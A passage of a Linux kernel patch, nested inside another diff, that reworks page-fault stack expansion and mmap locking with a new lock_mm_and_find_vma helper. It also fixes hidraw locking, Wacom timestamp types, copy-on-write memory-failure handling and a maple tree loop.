+-	 * on well-defined single instructions listed in the exception
+-	 * tables.  But, an erroneous kernel fault occurring outside one of
+-	 * those areas which also holds mmap_lock might deadlock attempting
+-	 * to validate the fault against the address space.
+-	 *
+-	 * Only do the expensive exception table search when we might be at
+-	 * risk of a deadlock.  This happens if we
+-	 * 1. Failed to acquire mmap_lock, and
+-	 * 2. The access did not originate in userspace.
+-	 */
+-	if (unlikely(!mmap_read_trylock(mm))) {
+-		if (!user_mode(regs) && !search_exception_tables(regs->ip)) {
+-			/*
+-			 * Fault from code in kernel from
+-			 * which we do not expect faults.
+-			 */
+-			bad_area_nosemaphore(regs, error_code, address);
+-			return;
+-		}
+ retry:
+-		mmap_read_lock(mm);
+-	} else {
+-		/*
+-		 * The above down_read_trylock() might have succeeded in
+-		 * which case we'll have missed the might_sleep() from
+-		 * down_read():
+-		 */
+-		might_sleep();
+-	}
+-
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (unlikely(!vma)) {
+-		bad_area(regs, error_code, address);
+-		return;
+-	}
+-	if (likely(vma->vm_start <= address))
+-		goto good_area;
+-	if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) {
+-		bad_area(regs, error_code, address);
+-		return;
+-	}
+-	if (unlikely(expand_stack(vma, address))) {
+-		bad_area(regs, error_code, address);
++		bad_area_nosemaphore(regs, error_code, address);
+ 		return;
+ 	}
+ 
+@@ -1406,7 +1359,6 @@ retry:
+ 	 * Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it..
+ 	 */
+-good_area:
+ 	if (unlikely(access_error(error_code, vma))) {
+ 		bad_area_access_error(regs, error_code, address, vma);
+ 		return;
+diff --git a/arch/xtensa/Kconfig b/arch/xtensa/Kconfig
+index bcb0c5d2abc2f..6d3c9257aa133 100644
+--- a/arch/xtensa/Kconfig
++++ b/arch/xtensa/Kconfig
+@@ -49,6 +49,7 @@ config XTENSA
+ 	select HAVE_SYSCALL_TRACEPOINTS
+ 	select HAVE_VIRT_CPU_ACCOUNTING_GEN
+ 	select IRQ_DOMAIN
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select PERF_USE_VMALLOC
+ 	select TRACE_IRQFLAGS_SUPPORT
+diff --git a/arch/xtensa/mm/fault.c b/arch/xtensa/mm/fault.c
+index 8c781b05c0bdd..d89b193c779f1 100644
+--- a/arch/xtensa/mm/fault.c
++++ b/arch/xtensa/mm/fault.c
+@@ -130,23 +130,14 @@ void do_page_fault(struct pt_regs *regs)
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ 
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, address);
+-
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++		goto bad_area_nosemaphore;
+ 
+ 	/* Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it..
+ 	 */
+ 
+-good_area:
+ 	code = SEGV_ACCERR;
+ 
+ 	if (is_write) {
+@@ -205,6 +196,7 @@ good_area:
+ 	 */
+ bad_area:
+ 	mmap_read_unlock(mm);
++bad_area_nosemaphore:
+ 	if (user_mode(regs)) {
+ 		current->thread.bad_vaddr = address;
+ 		current->thread.error_code = is_write;
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index b2cd7527de195..0b4204b9a253c 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -4348,7 +4348,7 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	{ /* wireless touchpad T651 */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH,
+ 		USB_DEVICE_ID_LOGITECH_T651),
+-	  .driver_data = HIDPP_QUIRK_CLASS_WTP },
++	  .driver_data = HIDPP_QUIRK_CLASS_WTP | HIDPP_QUIRK_DELAYED_INIT },
+ 	{ /* Mouse Logitech Anywhere MX */
+ 	  LDJ_DEVICE(0x1017), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
+ 	{ /* Mouse logitech M560 */
+diff --git a/drivers/hid/hidraw.c b/drivers/hid/hidraw.c
+index 197b1e7bf029e..b617aada50b06 100644
+--- a/drivers/hid/hidraw.c
++++ b/drivers/hid/hidraw.c
+@@ -272,7 +272,12 @@ static int hidraw_open(struct inode *inode, struct file *file)
+ 		goto out;
+ 	}
+ 
+-	down_read(&minors_rwsem);
++	/*
++	 * Technically not writing to the hidraw_table but a write lock is
++	 * required to protect the device refcount. This is symmetrical to
++	 * hidraw_release().
++	 */
++	down_write(&minors_rwsem);
+ 	if (!hidraw_table[minor] || !hidraw_table[minor]->exist) {
+ 		err = -ENODEV;
+ 		goto out_unlock;
+@@ -301,7 +306,7 @@ static int hidraw_open(struct inode *inode, struct file *file)
+ 	spin_unlock_irqrestore(&hidraw_table[minor]->list_lock, flags);
+ 	file->private_data = list;
+ out_unlock:
+-	up_read(&minors_rwsem);
++	up_write(&minors_rwsem);
+ out:
+ 	if (err < 0)
+ 		kfree(list);
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 9c30dd30537af..15cd0cabee2a9 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -1309,7 +1309,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 	struct input_dev *pen_input = wacom->pen_input;
+ 	unsigned char *data = wacom->data;
+ 	int number_of_valid_frames = 0;
+-	int time_interval = 15000000;
++	ktime_t time_interval = 15000000;
+ 	ktime_t time_packet_received = ktime_get();
+ 	int i;
+ 
+@@ -1343,7 +1343,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 	if (number_of_valid_frames) {
+ 		if (wacom->hid_data.time_delayed)
+ 			time_interval = ktime_get() - wacom->hid_data.time_delayed;
+-		time_interval /= number_of_valid_frames;
++		time_interval = div_u64(time_interval, number_of_valid_frames);
+ 		wacom->hid_data.time_delayed = time_packet_received;
+ 	}
+ 
+@@ -1354,7 +1354,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 		bool range = frame[0] & 0x20;
+ 		bool invert = frame[0] & 0x10;
+ 		int frames_number_reversed = number_of_valid_frames - i - 1;
+-		int event_timestamp = time_packet_received - frames_number_reversed * time_interval;
++		ktime_t event_timestamp = time_packet_received - frames_number_reversed * time_interval;
+ 
+ 		if (!valid)
+ 			continue;
+diff --git a/drivers/hid/wacom_wac.h b/drivers/hid/wacom_wac.h
+index 1a40bb8c5810c..ee21bb260f22f 100644
+--- a/drivers/hid/wacom_wac.h
++++ b/drivers/hid/wacom_wac.h
+@@ -324,7 +324,7 @@ struct hid_data {
+ 	int ps_connected;
+ 	bool pad_input_event_flag;
+ 	unsigned short sequence_number;
+-	int time_delayed;
++	ktime_t time_delayed;
+ };
+ 
+ struct wacom_remote_data {
+diff --git a/drivers/iommu/amd/iommu_v2.c b/drivers/iommu/amd/iommu_v2.c
+index 9f7fab49a5a90..75355ddca6575 100644
+--- a/drivers/iommu/amd/iommu_v2.c
++++ b/drivers/iommu/amd/iommu_v2.c
+@@ -485,8 +485,8 @@ static void do_fault(struct work_struct *work)
+ 	flags |= FAULT_FLAG_REMOTE;
+ 
+ 	mmap_read_lock(mm);
+-	vma = find_extend_vma(mm, address);
+-	if (!vma || address < vma->vm_start)
++	vma = vma_lookup(mm, address);
++	if (!vma)
+ 		/* failed to get a vma in the right range */
+ 		goto out;
+ 
+diff --git a/drivers/iommu/io-pgfault.c b/drivers/iommu/io-pgfault.c
+index 1df8c1dcae776..16e564cb393b7 100644
+--- a/drivers/iommu/io-pgfault.c
++++ b/drivers/iommu/io-pgfault.c
+@@ -89,7 +89,7 @@ iopf_handle_single(struct iopf_fault *iopf)
+ 
+ 	mmap_read_lock(mm);
+ 
+-	vma = find_extend_vma(mm, prm->addr);
++	vma = vma_lookup(mm, prm->addr);
+ 	if (!vma)
+ 		/* Unmapped area */
+ 		goto out_put_mm;
+diff --git a/drivers/thermal/mtk_thermal.c b/drivers/thermal/mtk_thermal.c
+index 62f1e691659e3..8440692e3890d 100644
+--- a/drivers/thermal/mtk_thermal.c
++++ b/drivers/thermal/mtk_thermal.c
+@@ -1028,12 +1028,7 @@ static int mtk_thermal_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	auxadc_base = devm_of_iomap(&pdev->dev, auxadc, 0, NULL);
+-	if (IS_ERR(auxadc_base)) {
+-		of_node_put(auxadc);
+-		return PTR_ERR(auxadc_base);
+-	}
+-
++	auxadc_base = of_iomap(auxadc, 0);
+ 	auxadc_phys_base = of_get_phys_base(auxadc);
+ 
+ 	of_node_put(auxadc);
+@@ -1049,12 +1044,7 @@ static int mtk_thermal_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	apmixed_base = devm_of_iomap(&pdev->dev, apmixedsys, 0, NULL);
+-	if (IS_ERR(apmixed_base)) {
+-		of_node_put(apmixedsys);
+-		return PTR_ERR(apmixed_base);
+-	}
+-
++	apmixed_base = of_iomap(apmixedsys, 0);
+ 	apmixed_phys_base = of_get_phys_base(apmixedsys);
+ 
+ 	of_node_put(apmixedsys);
+diff --git a/drivers/video/fbdev/core/sysimgblt.c b/drivers/video/fbdev/core/sysimgblt.c
+index 335e92b813fc4..665ef7a0a2495 100644
+--- a/drivers/video/fbdev/core/sysimgblt.c
++++ b/drivers/video/fbdev/core/sysimgblt.c
+@@ -189,7 +189,7 @@ static void fast_imageblit(const struct fb_image *image, struct fb_info *p,
+ 	u32 fgx = fgcolor, bgx = bgcolor, bpp = p->var.bits_per_pixel;
+ 	u32 ppw = 32/bpp, spitch = (image->width + 7)/8;
+ 	u32 bit_mask, eorx, shift;
+-	const char *s = image->data, *src;
++	const u8 *s = image->data, *src;
+ 	u32 *dst;
+ 	const u32 *tab;
+ 	size_t tablen;
+diff --git a/fs/binfmt_elf.c b/fs/binfmt_elf.c
+index 444302afc673a..e6c9c0e084486 100644
+--- a/fs/binfmt_elf.c
++++ b/fs/binfmt_elf.c
+@@ -315,10 +315,10 @@ create_elf_tables(struct linux_binprm *bprm, const struct elfhdr *exec,
+ 	 * Grow the stack manually; some architectures have a limit on how
+ 	 * far ahead a user-space access may be in order to grow the stack.
+ 	 */
+-	if (mmap_read_lock_killable(mm))
++	if (mmap_write_lock_killable(mm))
+ 		return -EINTR;
+-	vma = find_extend_vma(mm, bprm->p);
+-	mmap_read_unlock(mm);
++	vma = find_extend_vma_locked(mm, bprm->p);
++	mmap_write_unlock(mm);
+ 	if (!vma)
+ 		return -EFAULT;
+ 
+diff --git a/fs/exec.c b/fs/exec.c
+index a0b1f0337a628..283012eb1aeb9 100644
+--- a/fs/exec.c
++++ b/fs/exec.c
+@@ -198,33 +198,39 @@ static struct page *get_arg_page(struct linux_binprm *bprm, unsigned long pos,
+ 		int write)
+ {
+ 	struct page *page;
++	struct vm_area_struct *vma = bprm->vma;
++	struct mm_struct *mm = bprm->mm;
+ 	int ret;
+-	unsigned int gup_flags = FOLL_FORCE;
+ 
+-#ifdef CONFIG_STACK_GROWSUP
+-	if (write) {
+-		ret = expand_downwards(bprm->vma, pos);
+-		if (ret < 0)
++	/*
++	 * Avoid relying on expanding the stack down in GUP (which
++	 * does not work for STACK_GROWSUP anyway), and just do it
++	 * by hand ahead of time.
++	 */
++	if (write && pos < vma->vm_start) {
++		mmap_write_lock(mm);
++		ret = expand_downwards(vma, pos);
++		if (unlikely(ret < 0)) {
++			mmap_write_unlock(mm);
+ 			return NULL;
+-	}
+-#endif
+-
+-	if (write)
+-		gup_flags |= FOLL_WRITE;
++		}
++		mmap_write_downgrade(mm);
++	} else
++		mmap_read_lock(mm);
+ 
+ 	/*
+ 	 * We are doing an exec().  'current' is the process
+-	 * doing the exec and bprm->mm is the new process's mm.
++	 * doing the exec and 'mm' is the new process's mm.
+ 	 */
+-	mmap_read_lock(bprm->mm);
+-	ret = get_user_pages_remote(bprm->mm, pos, 1, gup_flags,
++	ret = get_user_pages_remote(mm, pos, 1,
++			write ? FOLL_WRITE : 0,
+ 			&page, NULL, NULL);
+-	mmap_read_unlock(bprm->mm);
++	mmap_read_unlock(mm);
+ 	if (ret <= 0)
+ 		return NULL;
+ 
+ 	if (write)
+-		acct_arg_size(bprm, vma_pages(bprm->vma));
++		acct_arg_size(bprm, vma_pages(vma));
+ 
+ 	return page;
+ }
+@@ -854,7 +860,7 @@ int setup_arg_pages(struct linux_binprm *bprm,
+ 		stack_base = vma->vm_start - stack_expand;
+ #endif
+ 	current->mm->start_stack = bprm->p;
+-	ret = expand_stack(vma, stack_base);
++	ret = expand_stack_locked(vma, stack_base);
+ 	if (ret)
+ 		ret = -EFAULT;
+ 
+diff --git a/include/linux/highmem.h b/include/linux/highmem.h
+index e9912da5441b4..44242268f53bd 100644
+--- a/include/linux/highmem.h
++++ b/include/linux/highmem.h
+@@ -319,6 +319,32 @@ static inline void copy_user_highpage(struct page *to, struct page *from,
+ 
+ #endif
+ 
++#ifdef copy_mc_to_kernel
++static inline int copy_mc_user_highpage(struct page *to, struct page *from,
++					unsigned long vaddr, struct vm_area_struct *vma)
++{
++	unsigned long ret;
++	char *vfrom, *vto;
++
++	vfrom = kmap_local_page(from);
++	vto = kmap_local_page(to);
++	ret = copy_mc_to_kernel(vto, vfrom, PAGE_SIZE);
++	if (!ret)
++		kmsan_unpoison_memory(page_address(to), PAGE_SIZE);
++	kunmap_local(vto);
++	kunmap_local(vfrom);
++
++	return ret;
++}
++#else
++static inline int copy_mc_user_highpage(struct page *to, struct page *from,
++					unsigned long vaddr, struct vm_area_struct *vma)
++{
++	copy_user_highpage(to, from, vaddr, vma);
++	return 0;
++}
++#endif
++
+ #ifndef __HAVE_ARCH_COPY_HIGHPAGE
+ 
+ static inline void copy_highpage(struct page *to, struct page *from)
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index e5e8acf8eb895..f5b6ef943ede2 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -1921,6 +1921,9 @@ void pagecache_isize_extended(struct inode *inode, loff_t from, loff_t to);
+ void truncate_pagecache_range(struct inode *inode, loff_t offset, loff_t end);
+ int generic_error_remove_page(struct address_space *mapping, struct page *page);
+ 
++struct vm_area_struct *lock_mm_and_find_vma(struct mm_struct *mm,
++		unsigned long address, struct pt_regs *regs);
++
+ #ifdef CONFIG_MMU
+ extern vm_fault_t handle_mm_fault(struct vm_area_struct *vma,
+ 				  unsigned long address, unsigned int flags,
+@@ -2808,16 +2811,11 @@ extern vm_fault_t filemap_page_mkwrite(struct vm_fault *vmf);
+ 
+ extern unsigned long stack_guard_gap;
+ /* Generic expand stack which grows the stack according to GROWS{UP,DOWN} */
+-extern int expand_stack(struct vm_area_struct *vma, unsigned long address);
++int expand_stack_locked(struct vm_area_struct *vma, unsigned long address);
++struct vm_area_struct *expand_stack(struct mm_struct * mm, unsigned long addr);
+ 
+ /* CONFIG_STACK_GROWSUP still needs to grow downwards at some places */
+-extern int expand_downwards(struct vm_area_struct *vma,
+-		unsigned long address);
+-#if VM_GROWSUP
+-extern int expand_upwards(struct vm_area_struct *vma, unsigned long address);
+-#else
+-  #define expand_upwards(vma, address) (0)
+-#endif
++int expand_downwards(struct vm_area_struct *vma, unsigned long address);
+ 
+ /* Look up the first VMA which satisfies  addr < vm_end,  NULL if none. */
+ extern struct vm_area_struct * find_vma(struct mm_struct * mm, unsigned long addr);
+@@ -2912,7 +2910,8 @@ unsigned long change_prot_numa(struct vm_area_struct *vma,
+ 			unsigned long start, unsigned long end);
+ #endif
+ 
+-struct vm_area_struct *find_extend_vma(struct mm_struct *, unsigned long addr);
++struct vm_area_struct *find_extend_vma_locked(struct mm_struct *,
++		unsigned long addr);
+ int remap_pfn_range(struct vm_area_struct *, unsigned long addr,
+ 			unsigned long pfn, unsigned long size, pgprot_t);
+ int remap_pfn_range_notrack(struct vm_area_struct *vma, unsigned long addr,
+@@ -3295,7 +3294,6 @@ enum mf_flags {
+ int mf_dax_kill_procs(struct address_space *mapping, pgoff_t index,
+ 		      unsigned long count, int mf_flags);
+ extern int memory_failure(unsigned long pfn, int flags);
+-extern void memory_failure_queue(unsigned long pfn, int flags);
+ extern void memory_failure_queue_kick(int cpu);
+ extern int unpoison_memory(unsigned long pfn);
+ extern int sysctl_memory_failure_early_kill;
+@@ -3304,8 +3302,12 @@ extern void shake_page(struct page *p);
+ extern atomic_long_t num_poisoned_pages __read_mostly;
+ extern int soft_offline_page(unsigned long pfn, int flags);
+ #ifdef CONFIG_MEMORY_FAILURE
++extern void memory_failure_queue(unsigned long pfn, int flags);
+ extern int __get_huge_page_for_hwpoison(unsigned long pfn, int flags);
+ #else
++static inline void memory_failure_queue(unsigned long pfn, int flags)
++{
++}
+ static inline int __get_huge_page_for_hwpoison(unsigned long pfn, int flags)
+ {
+ 	return 0;
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index b72268848ade1..2f1f661157c92 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -4281,11 +4281,13 @@ done:
+ 
+ static inline void mas_wr_end_piv(struct ma_wr_state *wr_mas)
+ {
+-	while ((wr_mas->mas->last > wr_mas->end_piv) &&
+-	       (wr_mas->offset_end < wr_mas->node_end))
+-		wr_mas->end_piv = wr_mas->pivots[++wr_mas->offset_end];
++	while ((wr_mas->offset_end < wr_mas->node_end) &&
++	       (wr_mas->mas->last > wr_mas->pivots[wr_mas->offset_end]))
++		wr_mas->offset_end++;
+ 
+-	if (wr_mas->mas->last > wr_mas->end_piv)
++	if (wr_mas->offset_end < wr_mas->node_end)
++		wr_mas->end_piv = wr_mas->pivots[wr_mas->offset_end];
++	else
+ 		wr_mas->end_piv = wr_mas->mas->max;
+ }
+ 
+@@ -4442,7 +4444,6 @@ static inline void *mas_wr_store_entry(struct ma_wr_state *wr_mas)
+ 	}
+ 
+ 	/* At this point, we are at the leaf node that needs to be altered. */
+-	wr_mas->end_piv = wr_mas->r_max;
+ 	mas_wr_end_piv(wr_mas);
+ 
+ 	if (!wr_mas->entry)
+diff --git a/mm/Kconfig b/mm/Kconfig
+index 57e1d8c5b5052..35109a4a2f7ce 100644
+--- a/mm/Kconfig
++++ b/mm/Kconfig
+@@ -1150,6 +1150,10 @@ config LRU_GEN_STATS
+ 	  This option has a per-memcg and per-node memory overhead.
+ # }
+ 
++config LOCK_MM_AND_FIND_VMA
++	bool
++	depends on !STACK_GROWSUP
++
+ source "mm/damon/Kconfig"
+ 
+ endmenu
+diff --git a/mm/gup.c b/mm/gup.c
+index 028f3b4e8c3f2..f4911ddd30707 100644
+--- a/mm/gup.c
++++ b/mm/gup.c
+@@ -1182,7 +1182,7 @@ static long __get_user_pages(struct mm_struct *mm,
+ 
+ 		/* first iteration or cross vma bound */
+ 		if (!vma || start >= vma->vm_end) {
+-			vma = find_extend_vma(mm, start);
++			vma = vma_lookup(mm, start);
+ 			if (!vma && in_gate_area(mm, start)) {
+ 				ret = get_gate_page(mm, start & PAGE_MASK,
+ 						gup_flags, &vma,
+@@ -1351,8 +1351,8 @@ int fixup_user_fault(struct mm_struct *mm,
+ 		fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_KILLABLE;
+ 
+ retry:
+-	vma = find_extend_vma(mm, address);
+-	if (!vma || address < vma->vm_start)
++	vma = vma_lookup(mm, address);
++	if (!vma)
+ 		return -EFAULT;
+ 
+ 	if (!vma_permits_fault(vma, fault_flags))
+diff --git a/mm/memory.c b/mm/memory.c
+index 747b7ea30f890..77549434d13a7 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -2843,10 +2843,16 @@ static inline int pte_unmap_same(struct vm_fault *vmf)
+ 	return same;
+ }
+ 
+-static inline bool __wp_page_copy_user(struct page *dst, struct page *src,
+-				       struct vm_fault *vmf)
++/*
++ * Return:
++ *	0:		copied succeeded
++ *	-EHWPOISON:	copy failed due to hwpoison in source page
++ *	-EAGAIN:	copied failed (some other reason)
++ */
++static inline int __wp_page_copy_user(struct page *dst, struct page *src,
++				      struct vm_fault *vmf)
+ {
+-	bool ret;
++	int ret;
+ 	void *kaddr;
+ 	void __user *uaddr;
+ 	bool locked = false;
+@@ -2855,8 +2861,11 @@ static inline bool __wp_page_copy_user(struct page *dst, struct page *src,
+ 	unsigned long addr = vmf->address;
+ 
+ 	if (likely(src)) {
+-		copy_user_highpage(dst, src, addr, vma);
+-		return true;
++		if (copy_mc_user_highpage(dst, src, addr, vma)) {
++			memory_failure_queue(page_to_pfn(src), 0);
++			return -EHWPOISON;
++		}
++		return 0;
+ 	}
+ 
+ 	/*
+@@ -2883,7 +2892,7 @@ static inline bool __wp_page_copy_user(struct page *dst, struct page *src,
+ 			 * and update local tlb only
+ 			 */
+ 			update_mmu_tlb(vma, addr, vmf->pte);
+-			ret = false;
++			ret = -EAGAIN;
+ 			goto pte_unlock;
+ 		}
+ 
+@@ -2908,7 +2917,7 @@ static inline bool __wp_page_copy_user(struct page *dst, struct page *src,
+ 		if (!likely(pte_same(*vmf->pte, vmf->orig_pte))) {
+ 			/* The PTE changed under us, update local tlb */
+ 			update_mmu_tlb(vma, addr, vmf->pte);
+-			ret = false;
++			ret = -EAGAIN;
+ 			goto pte_unlock;
+ 		}
+ 
+@@ -2927,7 +2936,7 @@ warn:
+ 		}
+ 	}
+ 
+-	ret = true;
++	ret = 0;
+ 
+ pte_unlock:
+ 	if (locked)
+@@ -3099,6 +3108,7 @@ static vm_fault_t wp_page_copy(struct vm_fault *vmf)
+ 	pte_t entry;
+ 	int page_copied = 0;
+ 	struct mmu_notifier_range range;
++	int ret;
+ 
+ 	delayacct_wpcopy_start();
+ 
+@@ -3116,19 +3126,21 @@ static vm_fault_t wp_page_copy(struct vm_fault *vmf)
+ 		if (!new_page)
+ 			goto oom;
+ 
+-		if (!__wp_page_copy_user(new_page, old_page, vmf)) {
++		ret = __wp_page_copy_user(new_page, old_page, vmf);
++		if (ret) {
+ 			/*
+ 			 * COW failed, if the fault was solved by other,
+ 			 * it's fine. If not, userspace would re-fault on
+ 			 * the same address and we will handle the fault
+ 			 * from the second attempt.
++			 * The -EHWPOISON case will not be retried.
+ 			 */
+ 			put_page(new_page);
+ 			if (old_page)
+ 				put_page(old_page);
+ 
+ 			delayacct_wpcopy_end();
+-			return 0;
++			return ret == -EHWPOISON ? VM_FAULT_HWPOISON : 0;
+ 		}
+ 		kmsan_copy_page_meta(new_page, old_page);
+ 	}
+@@ -5246,6 +5258,125 @@ vm_fault_t handle_mm_fault(struct vm_area_struct *vma, unsigned long address,
+ }
+ EXPORT_SYMBOL_GPL(handle_mm_fault);
+ 
++#ifdef CONFIG_LOCK_MM_AND_FIND_VMA
++#include <linux/extable.h>
++
++static inline bool get_mmap_lock_carefully(struct mm_struct *mm, struct pt_regs *regs)
++{
++	/* Even if this succeeds, make it clear we *might* have slept */
++	if (likely(mmap_read_trylock(mm))) {
++		might_sleep();
++		return true;
++	}
++
++	if (regs && !user_mode(regs)) {
++		unsigned long ip = instruction_pointer(regs);
++		if (!search_exception_tables(ip))
++			return false;
++	}
++
++	return !mmap_read_lock_killable(mm);
++}
++
++static inline bool mmap_upgrade_trylock(struct mm_struct *mm)
++{
++	/*
++	 * We don't have this operation yet.
++	 *
++	 * It should be easy enough to do: it's basically a
++	 *    atomic_long_try_cmpxchg_acquire()
++	 * from RWSEM_READER_BIAS -> RWSEM_WRITER_LOCKED, but
++	 * it also needs the proper lockdep magic etc.
++	 */
++	return false;
++}
++
++static inline bool upgrade_mmap_lock_carefully(struct mm_struct *mm, struct pt_regs *regs)
++{
++	mmap_read_unlock(mm);
++	if (regs && !user_mode(regs)) {
++		unsigned long ip = instruction_pointer(regs);
++		if (!search_exception_tables(ip))
++			return false;
++	}
++	return !mmap_write_lock_killable(mm);
++}
++
++/*
++ * Helper for page fault handling.
++ *
++ * This is kind of equivalend to "mmap_read_lock()" followed
++ * by "find_extend_vma()", except it's a lot more careful about
++ * the locking (and will drop the lock on failure).
++ *
++ * For example, if we have a kernel bug that causes a page
++ * fault, we don't want to just use mmap_read_lock() to get
++ * the mm lock, because that would deadlock if the bug were
++ * to happen while we're holding the mm lock for writing.
++ *
++ * So this checks the exception tables on kernel faults in
++ * order to only do this all for instructions that are actually
++ * expected to fault.
++ *
++ * We can also actually take the mm lock for writing if we
++ * need to extend the vma, which helps the VM layer a lot.
++ */
++struct vm_area_struct *lock_mm_and_find_vma(struct mm_struct *mm,
++			unsigned long addr, struct pt_regs *regs)
++{
++	struct vm_area_struct *vma;
++
++	if (!get_mmap_lock_carefully(mm, regs))
++		return NULL;
++
++	vma = find_vma(mm, addr);
++	if (likely(vma && (vma->vm_start <= addr)))
++		return vma;
++
++	/*
++	 * Well, dang. We might still be successful, but only
++	 * if we can extend a vma to do so.
++	 */
++	if (!vma || !(vma->vm_flags & VM_GROWSDOWN)) {
++		mmap_read_unlock(mm);
++		return NULL;
++	}
++
++	/*
++	 * We can try to upgrade the mmap lock atomically,
++	 * in which case we can continue to use the vma
++	 * we already looked up.
++	 *
++	 * Otherwise we'll have to drop the mmap lock and
++	 * re-take it, and also look up the vma again,
++	 * re-checking it.
++	 */
++	if (!mmap_upgrade_trylock(mm)) {
++		if (!upgrade_mmap_lock_carefully(mm, regs))
++			return NULL;
++
++		vma = find_vma(mm, addr);
++		if (!vma)
++			goto fail;
++		if (vma->vm_start <= addr)
++			goto success;
++		if (!(vma->vm_flags & VM_GROWSDOWN))
++			goto fail;
++	}
++
++	if (expand_stack_locked(vma, addr))
++		goto fail;
++
++success:
++	mmap_write_downgrade(mm);
++	return vma;
++
++fail:
++	mmap_write_unlock(mm);
++	return NULL;
++}
++#endif
++
+ #ifndef __PAGETABLE_P4D_FOLDED
+ /*
+  * Allocate p4d page table.
+@@ -5517,6 +5648,14 @@ int __access_remote_vm(struct mm_struct *mm, unsigned long addr, void *buf,
+ 	if (mmap_read_lock_killable(mm))
+ 		return 0;
+ 
++	/* We might need to expand the stack to access it */
++	vma = vma_lookup(mm, addr);
++	if (!vma) {
++		vma = expand_stack(mm, addr);
++		if (!vma)
++			return 0;
++	}
++
+ 	/* ignore errors, just check how much was successfully transferred */
+ 	while (len) {
+ 		int bytes, ret, offset;
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 14ca259189b77..b8af52db3bbe0 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -1945,7 +1945,7 @@ static int acct_stack_growth(struct vm_area_struct *vma,
+  * PA-RISC uses this for its stack; IA64 for its Register Backing Store.
+  * vma is the last one with address > vma->vm_end.  Have to extend vma.
+  */
+-int expand_upwards(struct vm_area_struct *vma, unsigned long address)
++static int expand_upwards(struct vm_area_struct *vma, unsigned long address)
+ {
+ 	struct mm_struct *mm = vma->vm_mm;
+ 	struct vm_area_struct *next;
+@@ -2036,6 +2036,7 @@ int expand_upwards(struct vm_area_struct *vma, unsigned long address)
+ 
+ /*
+  * vma is the first one with address < vma->vm_start.  Have to extend vma.
++ * mmap_lock held for writing.
+  */
+ int expand_downwards(struct vm_area_struct *vma, unsigned long address)
+ {
+@@ -2044,16 +2045,20 @@ int expand_downwards(struct vm_area_struct *vma, unsigned long address)
+ 	struct vm_area_struct *prev;
+ 	int error = 0;
+ 
++	if (!(vma->vm_flags & VM_GROWSDOWN))
++		return -EFAULT;
++
+ 	address &= PAGE_MASK;
+-	if (address < mmap_min_addr)
++	if (address < mmap_min_addr || address < FIRST_USER_ADDRESS)
+ 		return -EPERM;
+ 
+ 	/* Enforce stack_guard_gap */
+ 	prev = mas_prev(&mas, 0);
+ 	/* Check that both stack segments have the same anon_vma? */
+-	if (prev && !(prev->vm_flags & VM_GROWSDOWN) &&
+-			vma_is_accessible(prev)) {
+-		if (address - prev->vm_end < stack_guard_gap)
++	if (prev) {
++		if (!(prev->vm_flags & VM_GROWSDOWN) &&
++		    vma_is_accessible(prev) &&
++		    (address - prev->vm_end < stack_guard_gap))
+ 			return -ENOMEM;
+ 	}
+ 
+@@ -2132,13 +2137,12 @@ static int __init cmdline_parse_stack_guard_gap(char *p)
+ __setup("stack_guard_gap=", cmdline_parse_stack_guard_gap);
+ 
+ #ifdef CONFIG_STACK_GROWSUP
+-int expand_stack(struct vm_area_struct *vma, unsigned long address)
++int expand_stack_locked(struct vm_area_struct *vma, unsigned long address)
+ {
+ 	return expand_upwards(vma, address);
+ }
+ 
+-struct vm_area_struct *
+-find_extend_vma(struct mm_struct *mm, unsigned long addr)
++struct vm_area_struct *find_extend_vma_locked(struct mm_struct *mm, unsigned long addr)
+ {
+ 	struct vm_area_struct *vma, *prev;
+ 
+@@ -2146,20 +2150,23 @@ find_extend_vma(struct mm_struct *mm, unsigned long addr)
+ 	vma = find_vma_prev(mm, addr, &prev);
+ 	if (vma && (vma->vm_start <= addr))
+ 		return vma;
+-	if (!prev || expand_stack(prev, addr))
++	if (!prev)
++		return NULL;
++	if (expand_stack_locked(prev, addr))
+ 		return NULL;
+ 	if (prev->vm_flags & VM_LOCKED)
+ 		populate_vma_page_range(prev, addr, prev->vm_end, NULL);
+ 	return prev;
+ }
+ #else
+-int expand_stack(struct vm_area_struct *vma, unsigned long address)
++int expand_stack_locked(struct vm_area_struct *vma, unsigned long address)
+ {
++	if (unlikely(!(vma->vm_flags & VM_GROWSDOWN)))
++		return -EINVAL;
